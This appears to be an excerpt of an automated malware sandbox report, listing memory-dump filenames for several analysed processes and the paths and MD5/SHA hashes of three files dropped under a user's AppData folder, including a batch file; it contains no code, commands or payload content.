memory/1968-1-0x0000000000457000-0x0000000000459000-memory.dmp

memory/1968-0-0x0000000000400000-0x0000000000460160-memory.dmp

memory/1968-2-0x00000000004E0000-0x00000000005BC000-memory.dmp

memory/1968-4-0x0000000000400000-0x0000000000460160-memory.dmp

memory/1968-7-0x00000000004E0000-0x00000000005BC000-memory.dmp

memory/1968-6-0x00000000004E0000-0x00000000005BC000-memory.dmp

memory/1968-5-0x00000000004E0000-0x00000000005BC000-memory.dmp

memory/1968-3-0x00000000004E0000-0x00000000005BC000-memory.dmp

memory/1968-8-0x00000000004E0000-0x00000000005BC000-memory.dmp

memory/1968-9-0x00000000004E0000-0x00000000005BC000-memory.dmp

memory/2248-13-0x0000000002B40000-0x0000000002B41000-memory.dmp

memory/2248-14-0x00000000057E0000-0x00000000058BC000-memory.dmp

memory/2108-15-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-16-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-21-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-30-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-34-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-37-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-36-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-35-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-33-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-32-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-31-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-29-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-28-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-27-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-26-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-25-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-24-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-23-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-22-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-20-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-19-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2248-18-0x00000000057E0000-0x00000000058BC000-memory.dmp

memory/2108-38-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-39-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-40-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-41-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-43-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-42-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-44-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-52-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-47-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-46-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/2108-45-0x0000000000270000-0x00000000003BA000-memory.dmp

memory/1968-54-0x00000000004E0000-0x00000000005BC000-memory.dmp

memory/2188-61-0x00000000000D0000-0x000000000021A000-memory.dmp

memory/2188-65-0x00000000000D0000-0x000000000021A000-memory.dmp

memory/2188-62-0x00000000000D0000-0x000000000021A000-memory.dmp

memory/2188-63-0x00000000000D0000-0x000000000021A000-memory.dmp

memory/2188-64-0x00000000000D0000-0x000000000021A000-memory.dmp

memory/2188-73-0x00000000000D0000-0x000000000021A000-memory.dmp

memory/2188-72-0x00000000000D0000-0x000000000021A000-memory.dmp

memory/2188-71-0x00000000000D0000-0x000000000021A000-memory.dmp

memory/2188-70-0x00000000000D0000-0x000000000021A000-memory.dmp

memory/2188-69-0x00000000000D0000-0x000000000021A000-memory.dmp

memory/2188-68-0x00000000000D0000-0x000000000021A000-memory.dmp

memory/2188-67-0x00000000000D0000-0x000000000021A000-memory.dmp

memory/2188-66-0x00000000000D0000-0x000000000021A000-memory.dmp

C:\Users\Admin\AppData\Local\cb8d1f\a81118.bat

MD5 16c3800e39ce58c64e26b06547058a41
SHA1 272c42f839cc8b74fcf517257bc8deb50d383770
SHA256 2f34841c53225d8a1cd6a9541b657ddbdd31c9f17ed3e76beef32bad16391339
SHA512 fe7c7cfd073723fd52a0603caf9f31064b24a1360c26cf673eb7fb0fd643b859a49dd68d3701f71d083513a9895c622fa5df3fbbae1d008c38bb28265d176699

C:\Users\Admin\AppData\Local\cb8d1f\268379.94e8bf0

MD5 2949ce78f2b9e4f3b4e7cbd582776bc7
SHA1 cc8f62b150f399561dbdf6af7fda2c1d05be3dbf
SHA256 728c1f732efce403a0d343bb68f0f94e940d3fa24a5c319f415166a8b1f3ef8d
SHA512 a5bdd32ec3c72a616036a0b26a8a9ba7e3762196aba86bcb7d19119388b71cca72eb957e3845298fcb01d709f126478a5bc677959dac0debec88ebfdbe43abf9

C:\Users\Admin\AppData\Local\Temp\Cab620F.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa